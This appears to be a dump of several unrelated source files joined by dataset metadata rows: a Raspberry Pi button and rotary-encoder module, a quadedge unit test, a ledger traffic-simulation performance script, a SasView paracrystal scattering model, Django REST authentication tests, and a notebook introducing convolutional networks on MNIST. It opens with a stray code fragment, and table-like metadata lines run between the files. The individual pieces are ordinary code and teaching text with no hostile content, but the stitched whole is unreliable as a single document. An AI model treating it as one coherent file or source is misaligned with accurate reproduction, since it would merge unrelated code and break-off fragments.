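#   st_new, i_add, sts_by_one = insert_atom(st, 'Li', i_void = 1, r_imp = 1.6)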
| gpl-2.0 | 590,717,953,333,718,100 | 35.314083 | 252 | 0.560488 | false |
psistrm12/rpiradio | buttonIO.py | 1 | 2334 | #!/usr/bin/env python
#
# Raspberry Pi input using buttons and rotary encoders
#
# Acknowledgement: This code is a variation of the Rotary Switch Tutorial by Bob Rathbone.
# See http://www.bobrathbone.com/raspberrypi_rotary.htm for further information!
import RPi.GPIO as GPIO
class PushButton:
BUTTONDOWN = 1
BUTTONUP = 2
def __init__(self, pin, bouncetime, callback):
self.pin = pin
self.bouncetime = bouncetime
self.callback = callback
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(self.pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.add_event_detect(self.pin, GPIO.BOTH, callback=self.button_event, bouncetime=self.bouncetime)
return
    # Push button event handler (called on both press and release edges)
def button_event(self, b_event):
if GPIO.input(b_event):
event = self.BUTTONDOWN
else:
event = self.BUTTONUP
self.callback(event)
return
# end class PushButton
class RotaryEncoder:
CLOCKWISE = 3
ANTICLOCKWISE = 4
rotary_a = 0
rotary_b = 0
rotary_c = 0
last_state = 0
direction = 0
# Initialise rotary encoder object
def __init__(self,pinA,pinB,callback):
self.pinA = pinA
self.pinB = pinB
#self.button = button
self.callback = callback
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(self.pinA, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.pinB, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# add events
GPIO.add_event_detect(self.pinA, GPIO.FALLING, callback=self.switch_event)
GPIO.add_event_detect(self.pinB, GPIO.FALLING, callback=self.switch_event)
return
# Call back routine called by switch events
def switch_event(self,switch):
if GPIO.input(self.pinA):
self.rotary_a = 1
else:
self.rotary_a = 0
if GPIO.input(self.pinB):
self.rotary_b = 1
else:
self.rotary_b = 0
self.rotary_c = self.rotary_a ^ self.rotary_b
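        # Pack both pin levels plus their parity bit into a 3-bit state; between two
        # valid detent positions the state value changes by 1 in one rotation
        # direction and by 3 in the other, and requiring the same direction twice in
        # a row (below) filters out single glitches from contact bounce.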
new_state = self.rotary_a * 4 + self.rotary_b * 2 + self.rotary_c * 1
delta = (new_state - self.last_state) % 4
self.last_state = new_state
event = 0
if delta == 1:
if self.direction == self.CLOCKWISE:
event = self.direction
else:
self.direction = self.CLOCKWISE
elif delta == 3:
if self.direction == self.ANTICLOCKWISE:
event = self.direction
else:
self.direction = self.ANTICLOCKWISE
if event > 0:
self.callback(event)
return
# end class RotaryEncoder
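# Minimal wiring example (assumptions: rotary encoder on BCM pins 23/24 and push
# button on BCM pin 25 -- adjust to your own wiring). Run the module directly to
# print the decoded events.
if __name__ == "__main__":
    import time
    def on_button(event):
        if event == PushButton.BUTTONDOWN:
            print("button down")
        elif event == PushButton.BUTTONUP:
            print("button up")
    def on_rotate(event):
        if event == RotaryEncoder.CLOCKWISE:
            print("clockwise")
        elif event == RotaryEncoder.ANTICLOCKWISE:
            print("anticlockwise")
    button = PushButton(pin=25, bouncetime=200, callback=on_button)
    knob = RotaryEncoder(pinA=23, pinB=24, callback=on_rotate)
    try:
        while True:
            time.sleep(1)  # callbacks fire from the GPIO edge-detection threads
    except KeyboardInterrupt:
        GPIO.cleanup()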
| gpl-2.0 | -9,129,966,791,251,890,000 | 21.442308 | 100 | 0.693231 | false |
jdugge/GridToTIN | test/test_quadedge.py | 1 | 1157 | import unittest
import quadedge as qe
class TestQuadedge(unittest.TestCase):
def test_quadedge(self):
q = qe.QuadEdge()
e = q.base
self.assertIs(e, q.edges[0])
self.assertIsNot(e, e.rot)
self.assertIs(e._rot, e.rot)
self.assertIs(e, e.rot.rot.rot.rot)
self.assertIs(e.rot.rot.rot, e.inv_rot)
self.assertIsNot(e, e.sym)
self.assertIs(e, e.sym.sym)
self.assertIs(e.o_next, e)
self.assertIs(e.o_prev, e)
self.assertIs(e.d_next, e)
self.assertIs(e.d_prev, e)
self.assertIs(e.l_next, e.sym)
self.assertIs(e.l_prev, e.sym)
self.assertIs(e.r_next, e.sym)
self.assertIs(e.r_prev, e.sym)
def test_splice(self):
q0 = qe.QuadEdge()
q1 = qe.QuadEdge()
e0 = q0.base
e1 = q1.base
self.assertIsNot(e0, e1)
self.assertIs(e0.o_next, e0)
qe.splice(e0, e1)
self.assertIs(e0.o_next, e1)
self.assertIs(e1.o_next, e0)
self.assertIs(e0.l_next, e0.sym)
self.assertIs(e0.l_prev, e1.sym)
if __name__ == '__main__':
unittest.main()
| mit | 4,214,614,945,183,003,000 | 21.686275 | 47 | 0.554019 | false |
spivachuk/sovrin-node | scripts/performance/perf_traffic.py | 1 | 9901 | """
Created on Feb 27, 2018
@author: nhan.nguyen
This module contains class "TesterSimulateTraffic" that simulates the real time
traffic.
"""
import threading
import random
import time
import utils
import os
import asyncio
import argparse
import requests_sender
import requests_builder
import perf_add_requests
from perf_tester import Tester
class Option:
def __init__(self):
parser = argparse.ArgumentParser(
description='Script to simulate the traffic which will send'
'request to ledger in several sets. Each set contains '
                        'a specified number of requests and between two sets, '
'the system will be delayed for a random length of'
' time (from 1 to 10 seconds).\n\n',
            usage='To create 5 clients to simulate the traffic in 50 seconds, '
                  'with each set containing 100 requests.'
'\nuse: python3.6 perf_traffic.py -c 5 -t 50 -n 100')
parser.add_argument('-c',
help='Specify the number of clients '
                                 'that will be simulated. Default value will be 1.',
action='store',
type=int, default=1, dest='clients')
parser.add_argument('-n',
                            help='Number of transactions that will be sent '
'in a set. Default value will be 100.',
action='store', type=int,
default=100, dest='transactions_delay')
parser.add_argument('--log',
                            help='To see all logs. If this flag is not set, '
                                 'the program only prints failure messages',
action='store_true', default=False, dest='log')
parser.add_argument('-to',
help='Timeout of testing. '
'Default value will be 100.',
action='store', type=int,
default=100, dest='time_out')
parser.add_argument('--init',
help='To build "GET" request, we need to '
'send "ADD" request first. This argument is '
'the number of "ADD" request will be sent '
'to ledger to make sample for "GET" requests.'
' Default value will be 100',
action='store', type=int,
default=100, dest='number_of_request_samples')
self.args = parser.parse_args()
def catch_number_of_request_samples():
"""
    Parse the number of "GET" request samples to be created.
    If the number is less than or equal to zero, the default value (100) will be
    returned.
    :return: number of "GET" request samples.
"""
import sys
result = 100
if "--init" in sys.argv:
index = sys.argv.index("--init")
if index < len(sys.argv) - 1:
temp = -1
try:
temp = int(sys.argv[index + 1])
except ValueError:
pass
if temp > 0:
result = temp
return result
class TesterSimulateTraffic(Tester):
__sample_req_info = {}
__kinds_of_request = ["nym", "attribute", "schema", "claim",
"get_nym", "get_attribute", "get_schema",
"get_claim"]
__number_of_request_samples = catch_number_of_request_samples()
def __init__(self, number_of_clients: int = 2,
transactions_delay: int = 100,
time_out: int = 300, log=False,
seed="000000000000000000000000Trustee1"):
super().__init__(log=log, seed=seed)
utils.run_async_method(
None, TesterSimulateTraffic._prepare_samples_for_get_req,
TesterSimulateTraffic.__number_of_request_samples)
if time_out <= 0 or transactions_delay <= 0 or number_of_clients <= 0:
return
self.transactions_delay = transactions_delay
self.time_out = time_out
self.number_of_clients = number_of_clients
self.current_total_txn = 0
self.__current_time = time.time()
self.__lock = threading.Lock()
self.__sender = requests_sender.RequestsSender()
async def _test(self):
"""
Override from "Tester" class to implement testing steps.
"""
lst_threads = list()
self.__current_time = time.time()
for _ in range(self.number_of_clients):
thread = threading.Thread(target=self.__simulate_client)
thread.setDaemon(True)
thread.start()
lst_threads.append(thread)
for thread in lst_threads:
thread.join(self.time_out * 1.1)
self.passed_req = self.__sender.passed_req
self.failed_req = self.__sender.failed_req
self.fastest_txn = self.__sender.fastest_txn
self.lowest_txn = self.__sender.lowest_txn
def __update(self):
"""
Synchronize within threads to update some necessary information.
"""
self.__lock.acquire()
if self.start_time == 0 and self.finish_time != 0:
self.start_time = self.finish_time
if self.current_total_txn != 0 and \
self.current_total_txn % self.transactions_delay == 0:
time.sleep(random.randint(1, 10))
self.current_total_txn += 1
self.__lock.release()
def __simulate_client(self):
"""
Simulate a client to create real time traffic.
"""
loop = asyncio.new_event_loop()
args = {"wallet_handle": self.wallet_handle,
"pool_handle": self.pool_handle,
"submitter_did": self.submitter_did}
asyncio.set_event_loop(loop)
while True:
self.__update()
if time.time() - self.__current_time >= self.time_out:
break
self.finish_time = utils.run_async_method(
loop, TesterSimulateTraffic._build_and_send_request,
self.__sender, args)
loop.close()
@staticmethod
async def generate_sample_request_info(kind,
sample_num: int = 100) -> list:
"""
Generate sample request information.
:param kind: kind of request.
:param sample_num: number of samples will be generated.
:return: a list of samples request information.
"""
kinds = ["nym", "schema", "attribute", "claim"]
if kind not in kinds or sample_num <= 0:
return []
generator = perf_add_requests.PerformanceTesterForAddingRequest(
request_num=sample_num, request_kind=kind)
await generator.test()
lst_info = list()
with open(generator.info_file_path, "r") as info_file:
for line in info_file:
if len(line) > 2:
lst_info.append(line)
try:
os.remove(generator.info_file_path)
except IOError:
pass
return lst_info
@staticmethod
async def _prepare_samples_for_get_req(sample_num: int = 100):
"""
Init samples for "GET" requests.
        :param sample_num: number of sample request info entries to create for
each kind of request (nym, attribute, claim, schema)
"""
if TesterSimulateTraffic.__sample_req_info:
return
keys = ["nym", "attribute", "schema", "claim"]
if sample_num <= 0:
return
for key in keys:
TesterSimulateTraffic.__sample_req_info[key] = \
await TesterSimulateTraffic.generate_sample_request_info(
key, sample_num)
@staticmethod
def _random_req_kind():
"""
Random choice a request kind.
:return: request kind.
"""
return random.choice(TesterSimulateTraffic.__kinds_of_request)
@staticmethod
def _random_sample_for_get_request(kind: str):
"""
Choice randomly a sample of request info base on kind of request.
:param kind: kind of request (get_nym, get_attribute,
get_claim, get_schema).
:return: a random sample of request info.
"""
if kind.startswith("get_"):
return random.choice(
TesterSimulateTraffic.__sample_req_info[kind.replace(
"get_", "")])
return ""
@staticmethod
async def _build_and_send_request(sender, args):
"""
Build a request and send it onto ledger.
:param sender: send the request.
:param args: contains some arguments to send request to ledger
(pool handle, wallet handle, submitter did)
:return: response time.
"""
kind = TesterSimulateTraffic._random_req_kind()
data = TesterSimulateTraffic._random_sample_for_get_request(kind)
req = await requests_builder.RequestBuilder.build_request(args, kind,
data)
return await sender.send_request(args, kind, req)
if __name__ == '__main__':
opts = Option().args
tester = TesterSimulateTraffic(number_of_clients=opts.clients,
transactions_delay=opts.transactions_delay,
time_out=opts.time_out, log=opts.log)
utils.run_async_method(None, tester.test)
elapsed_time = tester.finish_time - tester.start_time
utils.print_client_result(tester.passed_req, tester.failed_req,
elapsed_time)
| apache-2.0 | 5,081,833,395,924,299,000 | 33.378472 | 79 | 0.54045 | false |
SasView/sasmodels | sasmodels/models/fcc_paracrystal.py | 1 | 6252 | #fcc paracrystal model
#note model title and parameter table are automatically inserted
#note - calculation requires double precision
r"""
.. warning:: This model and this model description are under review following
concerns raised by SasView users. If you need to use this model,
please email [email protected] for the latest situation. *The
SasView Developers. September 2018.*
Definition
----------
Calculates the scattering from a **face-centered cubic lattice** with
paracrystalline distortion. Thermal vibrations are considered to be
negligible, and the size of the paracrystal is infinitely large.
Paracrystalline distortion is assumed to be isotropic and characterized by
a Gaussian distribution.
The scattering intensity $I(q)$ is calculated as
.. math::
I(q) = \frac{\text{scale}}{V_p} V_\text{lattice} P(q) Z(q)
where *scale* is the volume fraction of spheres, $V_p$ is the volume of
the primary particle, $V_\text{lattice}$ is a volume correction for the crystal
structure, $P(q)$ is the form factor of the sphere (normalized), and $Z(q)$
is the paracrystalline structure factor for a face-centered cubic structure.
Equation (1) of the 1990 reference\ [#Matsuoka1990]_ is used to calculate
$Z(q)$, using equations (23)-(25) from the 1987 paper\ [#Matsuoka1987]_ for
$Z1$, $Z2$, and $Z3$.
The lattice correction (the occupied volume of the lattice) for a
face-centered cubic structure of particles of radius $R$ and nearest
neighbor separation $D$ is
.. math::
V_\text{lattice} = \frac{16\pi}{3}\frac{R^3}{\left(D\sqrt{2}\right)^3}
The distortion factor (one standard deviation) of the paracrystal is
included in the calculation of $Z(q)$
.. math::
\Delta a = gD
where $g$ is a fractional distortion based on the nearest neighbor distance.
.. figure:: img/fcc_geometry.jpg
Face-centered cubic lattice.
For a crystal, diffraction peaks appear at reduced q-values given by
.. math::
\frac{qD}{2\pi} = \sqrt{h^2 + k^2 + l^2}
where for a face-centered cubic lattice $h, k , l$ all odd or all
even are allowed and reflections where $h, k, l$ are mixed odd/even
are forbidden. Thus the peak positions correspond to (just the first 5)
.. math::
\begin{array}{cccccc}
q/q_0 & 1 & \sqrt{4/3} & \sqrt{8/3} & \sqrt{11/3} & \sqrt{4} \\
\text{Indices} & (111) & (200) & (220) & (311) & (222)
\end{array}
.. note::
The calculation of $Z(q)$ is a double numerical integral that must be
carried out with a high density of points to properly capture the sharp
peaks of the paracrystalline scattering. So be warned that the calculation
is slow. Fitting of any experimental data must be resolution smeared for
any meaningful fit. This makes a triple integral which may be very slow.
The 2D (Anisotropic model) is based on the reference below where $I(q)$ is
approximated for 1d scattering. Thus the scattering pattern for 2D may not
be accurate particularly at low $q$. For general details of the calculation
and angular dispersions for oriented particles see :ref:`orientation`.
Note that we are not responsible for any incorrectness of the
2D model computation.
.. figure:: img/parallelepiped_angle_definition.png
Orientation of the crystal with respect to the scattering plane, when
$\theta = \phi = 0$ the $c$ axis is along the beam direction (the $z$ axis).
References
----------
.. [#Matsuoka1987] Hideki Matsuoka et. al. *Physical Review B*, 36 (1987)
1754-1765 (Original Paper)
.. [#Matsuoka1990] Hideki Matsuoka et. al. *Physical Review B*, 41 (1990)
3854-3856 (Corrections to FCC and BCC lattice structure calculation)
Authorship and Verification
---------------------------
* **Author:** NIST IGOR/DANSE **Date:** pre 2010
* **Last Modified by:** Paul Butler **Date:** September 29, 2016
* **Last Reviewed by:** Richard Heenan **Date:** March 21, 2016
"""
import numpy as np
from numpy import inf, pi
name = "fcc_paracrystal"
title = "Face-centred cubic lattic with paracrystalline distortion"
description = """
Calculates the scattering from a **face-centered cubic lattice** with
paracrystalline distortion. Thermal vibrations are considered to be
negligible, and the size of the paracrystal is infinitely large.
Paracrystalline distortion is assumed to be isotropic and characterized
by a Gaussian distribution.
"""
category = "shape:paracrystal"
single = False
# pylint: disable=bad-whitespace, line-too-long
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["dnn", "Ang", 220, [-inf, inf], "", "Nearest neighbour distance"],
["d_factor", "", 0.06, [-inf, inf], "", "Paracrystal distortion factor"],
["radius", "Ang", 40, [0, inf], "volume", "Particle radius"],
["sld", "1e-6/Ang^2", 4, [-inf, inf], "sld", "Particle scattering length density"],
["sld_solvent", "1e-6/Ang^2", 1, [-inf, inf], "sld", "Solvent scattering length density"],
["theta", "degrees", 60, [-360, 360], "orientation", "c axis to beam angle"],
["phi", "degrees", 60, [-360, 360], "orientation", "rotation about beam"],
["psi", "degrees", 60, [-360, 360], "orientation", "rotation about c axis"]
]
# pylint: enable=bad-whitespace, line-too-long
source = ["lib/sas_3j1x_x.c", "lib/gauss150.c", "lib/sphere_form.c", "fcc_paracrystal.c"]
def random():
"""Return a random parameter set for the model."""
# copied from bcc_paracrystal
radius = 10**np.random.uniform(1.3, 4)
d_factor = 10**np.random.uniform(-2, -0.7) # sigma_d in 0.01-0.7
dnn_fraction = np.random.beta(a=10, b=1)
dnn = radius*4/np.sqrt(2)/dnn_fraction
pars = dict(
#sld=1, sld_solvent=0, scale=1, background=1e-32,
dnn=dnn,
d_factor=d_factor,
radius=radius,
)
return pars
# april 10 2017, rkh add unit tests, NOT compared with any other calc method, assume correct!
# TODO: fix the 2d tests
q = 4.*pi/220.
tests = [
[{}, [0.001, q, 0.215268], [0.275164706668, 5.7776842567, 0.00958167119232]],
#[{}, (-0.047, -0.007), 238.103096286],
#[{}, (0.053, 0.063), 0.863609587796],
]
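# Illustrative aside (assumption: not part of the sasmodels model interface; it only
# runs when this file is executed directly). It reproduces the first allowed FCC
# reflections from the docstring, q/q0 = sqrt((h^2+k^2+l^2)/3) with h, k, l all even
# or all odd.
if __name__ == "__main__":
    import itertools
    allowed = set()
    for h, k, l in itertools.product(range(5), repeat=3):
        if (h, k, l) == (0, 0, 0):
            continue
        if all(i % 2 == 0 for i in (h, k, l)) or all(i % 2 == 1 for i in (h, k, l)):
            allowed.add(h*h + k*k + l*l)
    print(sorted(np.sqrt(n/3.) for n in allowed)[:5])  # -> 1, sqrt(4/3), sqrt(8/3), ...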
| bsd-3-clause | -7,846,327,260,319,252,000 | 37.832298 | 104 | 0.671465 | false |
motherjones/mirrors | mirrors/tests/test_auth.py | 1 | 1445 | from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class ComponentAuthenticationTest(APITestCase):
fixtures = ['users.json', 'component_data.json']
def test_noauthed_rejects(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_authed_as_user_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_user', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authed_as_staff_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_staff', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_authed_as_admin_accepts(self):
url = reverse('component-detail', kwargs={
'slug': 'component-with-svg-data'
})
self.client.login(username='test_admin', password='password1')
res = self.client.get(url)
self.assertEqual(res.status_code, status.HTTP_200_OK)
| mit | 7,669,851,948,419,885,000 | 32.604651 | 71 | 0.640138 | false |
lamastex/scalable-data-science | dbcArchives/2021/000_6-sds-3-x-dl/055_DLbyABr_04-ConvolutionalNetworks.py | 1 | 22551 | # Databricks notebook source
# MAGIC %md
# MAGIC ScaDaMaLe Course [site](https://lamastex.github.io/scalable-data-science/sds/3/x/) and [book](https://lamastex.github.io/ScaDaMaLe/index.html)
# MAGIC
# MAGIC This is a 2019-2021 augmentation and update of [Adam Breindel](https://www.linkedin.com/in/adbreind)'s initial notebooks.
# MAGIC
# MAGIC _Thanks to [Christian von Koch](https://www.linkedin.com/in/christianvonkoch/) and [William Anzén](https://www.linkedin.com/in/william-anz%C3%A9n-b52003199/) for their contributions towards making these materials Spark 3.0.1 and Python 3+ compliant._
# COMMAND ----------
# MAGIC %md
# MAGIC # Convolutional Neural Networks
# MAGIC ## aka CNN, ConvNet
# COMMAND ----------
# MAGIC %md
# MAGIC As a baseline, let's start a lab running with what we already know.
# MAGIC
# MAGIC We'll take our deep feed-forward multilayer perceptron network, with ReLU activations and reasonable initializations, and apply it to learning the MNIST digits.
# MAGIC
# MAGIC The main part of the code looks like the following (full code you can run is in the next cell):
# MAGIC
# MAGIC ```
# MAGIC # imports, setup, load data sets
# MAGIC
# MAGIC model = Sequential()
# MAGIC model.add(Dense(20, input_dim=784, kernel_initializer='normal', activation='relu'))
# MAGIC model.add(Dense(15, kernel_initializer='normal', activation='relu'))
# MAGIC model.add(Dense(10, kernel_initializer='normal', activation='softmax'))
# MAGIC model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['categorical_accuracy'])
# MAGIC
# MAGIC categorical_labels = to_categorical(y_train, num_classes=10)
# MAGIC
# MAGIC history = model.fit(X_train, categorical_labels, epochs=100, batch_size=100)
# MAGIC
# MAGIC # print metrics, plot errors
# MAGIC ```
# MAGIC
# MAGIC Note the changes, which are largely about building a classifier instead of a regression model:
# MAGIC * Output layer has one neuron per category, with softmax activation
# MAGIC * __Loss function is cross-entropy loss__
# MAGIC * Accuracy metric is categorical accuracy
# COMMAND ----------
# MAGIC %md
# MAGIC Let's hold pointers into wikipedia for these new concepts.
# COMMAND ----------
# MAGIC %scala
# MAGIC //This allows easy embedding of publicly available information into any other notebook
# MAGIC //Example usage:
# MAGIC // displayHTML(frameIt("https://en.wikipedia.org/wiki/Latent_Dirichlet_allocation#Topics_in_LDA",250))
# MAGIC def frameIt( u:String, h:Int ) : String = {
# MAGIC """<iframe
# MAGIC src=""""+ u+""""
# MAGIC width="95%" height="""" + h + """"
# MAGIC sandbox>
# MAGIC <p>
# MAGIC <a href="http://spark.apache.org/docs/latest/index.html">
# MAGIC Fallback link for browsers that, unlikely, don't support frames
# MAGIC </a>
# MAGIC </p>
# MAGIC </iframe>"""
# MAGIC }
# MAGIC displayHTML(frameIt("https://en.wikipedia.org/wiki/Cross_entropy#Cross-entropy_error_function_and_logistic_regression",500))
# COMMAND ----------
# MAGIC %scala
# MAGIC displayHTML(frameIt("https://en.wikipedia.org/wiki/Softmax_function",380))
# COMMAND ----------
# MAGIC %md
# MAGIC The following is from: [https://www.quora.com/How-does-Keras-calculate-accuracy](https://www.quora.com/How-does-Keras-calculate-accuracy).
# MAGIC
# MAGIC **Categorical accuracy:**
# MAGIC
# MAGIC ```%python
# MAGIC def categorical_accuracy(y_true, y_pred):
# MAGIC return K.cast(K.equal(K.argmax(y_true, axis=-1),
# MAGIC K.argmax(y_pred, axis=-1)),
# MAGIC K.floatx())
# MAGIC ```
# MAGIC
# MAGIC > `K.argmax(y_true)` takes the highest value to be the prediction and matches against the comparative set.
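# COMMAND ----------
# Illustrative aside (not used by the model code below): a tiny numpy sketch of
# softmax, categorical cross-entropy, and categorical accuracy for a single sample.
import numpy as np
demo_logits = np.array([2.0, 1.0, 0.1])
demo_probs = np.exp(demo_logits) / np.sum(np.exp(demo_logits))   # softmax: positive, sums to 1
demo_true = np.array([1.0, 0.0, 0.0])                            # one-hot label (cf. to_categorical)
demo_xent = -np.sum(demo_true * np.log(demo_probs))              # categorical cross-entropy loss
demo_acc = float(np.argmax(demo_probs) == np.argmax(demo_true))  # categorical accuracy (this sample)
print("softmax " + str(demo_probs) + "  xent " + str(round(demo_xent, 4)) + "  acc " + str(demo_acc))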
# COMMAND ----------
# MAGIC %md
# MAGIC Watch (1:39)
# MAGIC * [](https://www.youtube.com/watch?v=tRsSi_sqXjI)
# MAGIC
# MAGIC Watch (1:54)
# MAGIC * [](https://www.youtube.com/watch?v=x449QQDhMDE)
# COMMAND ----------
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
import sklearn.datasets
import datetime
import matplotlib.pyplot as plt
import numpy as np
train_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-train.txt"
test_libsvm = "/dbfs/databricks-datasets/mnist-digits/data-001/mnist-digits-test.txt"
X_train, y_train = sklearn.datasets.load_svmlight_file(train_libsvm, n_features=784)
X_train = X_train.toarray()
X_test, y_test = sklearn.datasets.load_svmlight_file(test_libsvm, n_features=784)
X_test = X_test.toarray()
model = Sequential()
model.add(Dense(20, input_dim=784, kernel_initializer='normal', activation='relu'))
model.add(Dense(15, kernel_initializer='normal', activation='relu'))
model.add(Dense(10, kernel_initializer='normal', activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['categorical_accuracy'])
categorical_labels = to_categorical(y_train, num_classes=10)
start = datetime.datetime.today()
history = model.fit(X_train, categorical_labels, epochs=40, batch_size=100, validation_split=0.1, verbose=2)
scores = model.evaluate(X_test, to_categorical(y_test, num_classes=10))
print
for i in range(len(model.metrics_names)):
print("%s: %f" % (model.metrics_names[i], scores[i]))
print ("Start: " + str(start))
end = datetime.datetime.today()
print ("End: " + str(end))
print ("Elapse: " + str(end-start))
# COMMAND ----------
# MAGIC %md
# MAGIC after about a minute we have:
# MAGIC
# MAGIC ```
# MAGIC ...
# MAGIC
# MAGIC Epoch 40/40
# MAGIC 1s - loss: 0.0610 - categorical_accuracy: 0.9809 - val_loss: 0.1918 - val_categorical_accuracy: 0.9583
# MAGIC
# MAGIC ...
# MAGIC
# MAGIC loss: 0.216120
# MAGIC
# MAGIC categorical_accuracy: 0.955000
# MAGIC
# MAGIC Start: 2017-12-06 07:35:33.948102
# MAGIC
# MAGIC End: 2017-12-06 07:36:27.046130
# MAGIC
# MAGIC Elapse: 0:00:53.098028
# MAGIC ```
# COMMAND ----------
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
fig.set_size_inches((5,5))
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
display(fig)
# COMMAND ----------
# MAGIC %md
# MAGIC What are the big takeaways from this experiment?
# MAGIC
# MAGIC 1. We get pretty impressive "apparent error" accuracy right from the start! A small network gets us to training accuracy 97% by epoch 20
# MAGIC 2. The model *appears* to continue to learn if we let it run, although it does slow down and oscillate a bit.
# MAGIC 3. Our test accuracy is about 95% after 5 epochs and never gets better ... it gets worse!
# MAGIC 4. Therefore, we are overfitting very quickly... most of the "training" turns out to be a waste.
# MAGIC 5. For what it's worth, we get 95% accuracy without much work.
# MAGIC
# MAGIC This is not terrible compared to other, non-neural-network approaches to the problem. After all, we could probably tweak this a bit and do even better.
# MAGIC
# MAGIC But we talked about using deep learning to solve "95%" problems or "98%" problems ... where one error in 20, or 50 simply won't work. If we can get to "multiple nines" of accuracy, then we can do things like automate mail sorting and translation, create cars that react properly (all the time) to street signs, and control systems for robots or drones that function autonomously.
# MAGIC
# MAGIC Try two more experiments (try them separately):
# MAGIC 1. Add a third, hidden layer.
# MAGIC 2. Increase the size of the hidden layers.
# MAGIC
# MAGIC Adding another layer slows things down a little (why?) but doesn't seem to make a difference in accuracy.
# MAGIC
# MAGIC Adding a lot more neurons into the first topology slows things down significantly -- 10x as many neurons, and only a marginal increase in accuracy. Notice also (in the plot) that the learning clearly degrades after epoch 50 or so.
# MAGIC
# MAGIC ... We need a new approach!
# MAGIC
# MAGIC ---
# MAGIC
# MAGIC ... let's think about this:
# MAGIC
# MAGIC ### What is layer 2 learning from layer 1? Combinations of pixels
# MAGIC
# MAGIC #### Combinations of pixels contain information but...
# MAGIC
# MAGIC There are a lot of them (combinations) and they are "fragile"
# MAGIC
# MAGIC In fact, in our last experiment, we basically built a model that memorizes a bunch of "magic" pixel combinations.
# MAGIC
# MAGIC What might be a better way to build features?
# MAGIC
# MAGIC * When humans perform this task, we look not at arbitrary pixel combinations, but certain geometric patterns -- lines, curves, loops.
# MAGIC * These features are made up of combinations of pixels, but they are far from arbitrary
# MAGIC * We identify these features regardless of translation, rotation, etc.
# MAGIC
# MAGIC Is there a way to get the network to do the same thing?
# MAGIC
# MAGIC I.e., in layer one, identify pixels. Then in layer 2+, identify abstractions over pixels that are translation-invariant 2-D shapes?
# MAGIC
# MAGIC We could look at where a "filter" that represents one of these features (e.g., and edge) matches the image.
# MAGIC
# MAGIC How would this work?
# MAGIC
# MAGIC ### Convolution
# MAGIC
# MAGIC Convolution in the general mathematical sense is define as follows:
# MAGIC
# MAGIC <img src="https://i.imgur.com/lurC2Cx.png" width=300>
# MAGIC
# MAGIC The convolution we deal with in deep learning is a simplified case. We want to compare two signals. Here are two visualizations, courtesy of Wikipedia, that help communicate how convolution emphasizes features:
# MAGIC
# MAGIC <img src="http://i.imgur.com/EDCaMl2.png" width=500>
# MAGIC
# MAGIC ---
# MAGIC
# MAGIC #### Here's an animation (where we change \\({\tau}\\))
# MAGIC <img src="http://i.imgur.com/0BFcnaw.gif">
# MAGIC
# MAGIC __In one sense, the convolution captures and quantifies the pattern matching over space__
# MAGIC
# MAGIC If we perform this in two dimensions, we can achieve effects like highlighting edges:
# MAGIC
# MAGIC <img src="http://i.imgur.com/DKEXIII.png">
# MAGIC
# MAGIC The matrix here, also called a convolution kernel, is one of the functions we are convolving. Other convolution kernels can blur, "sharpen," etc.
# MAGIC
# MAGIC ### So we'll drop in a number of convolution kernels, and the network will learn where to use them? Nope. Better than that.
# MAGIC
# MAGIC ## We'll program in the *idea* of discrete convolution, and the network will learn what kernels extract meaningful features!
# MAGIC
# MAGIC The values in a (fixed-size) convolution kernel matrix will be variables in our deep learning model. Although intuitively it seems like it would be hard to learn useful params, in fact, since those variables are used repeatedly across the image data, it "focuses" the error on a smallish number of parameters with a lot of influence -- so it should be vastly *less* expensive to train than just a huge fully connected layer like we discussed above.
# MAGIC
# MAGIC This idea was developed in the late 1980s, and by 1989, Yann LeCun (at AT&T/Bell Labs) had built a practical high-accuracy system (used in the 1990s for processing handwritten checks and mail).
# MAGIC
# MAGIC __How do we hook this into our neural networks?__
# MAGIC
# MAGIC * First, we can preserve the geometric properties of our data by "shaping" the vectors as 2D instead of 1D.
# MAGIC
# MAGIC * Then we'll create a layer whose value is not just activation applied to weighted sum of inputs, but instead it's the result of a dot-product (element-wise multiply and sum) between the kernel and a patch of the input vector (image).
# MAGIC * This value will be our "pre-activation" and optionally feed into an activation function (or "detector")
# MAGIC
# MAGIC <img src="http://i.imgur.com/ECyi9lL.png">
# MAGIC
# MAGIC
# MAGIC If we perform this operation at lots of positions over the image, we'll get lots of outputs, as many as one for every input pixel.
# MAGIC
# MAGIC
# MAGIC <img src="http://i.imgur.com/WhOrJ0Y.jpg">
# MAGIC
# MAGIC * So we'll add another layer that "picks" the highest convolution pattern match from nearby pixels, which
# MAGIC * makes our pattern match a little bit translation invariant (a fuzzy location match)
# MAGIC * reduces the number of outputs significantly
# MAGIC * This layer is commonly called a pooling layer, and if we pick the "maximum match" then it's a "max pooling" layer.
# MAGIC
# MAGIC <img src="http://i.imgur.com/9iPpfpb.png">
# MAGIC
# MAGIC __The end result is that the kernel or filter together with max pooling creates a value in a subsequent layer which represents the appearance of a pattern in a local area in a prior layer.__
# MAGIC
# MAGIC __Again, the network will be given a number of "slots" for these filters and will learn (by minimizing error) what filter values produce meaningful features. This is the key insight into how modern image-recognition networks are able to generalize -- i.e., learn to tell 6s from 7s or cats from dogs.__
# MAGIC
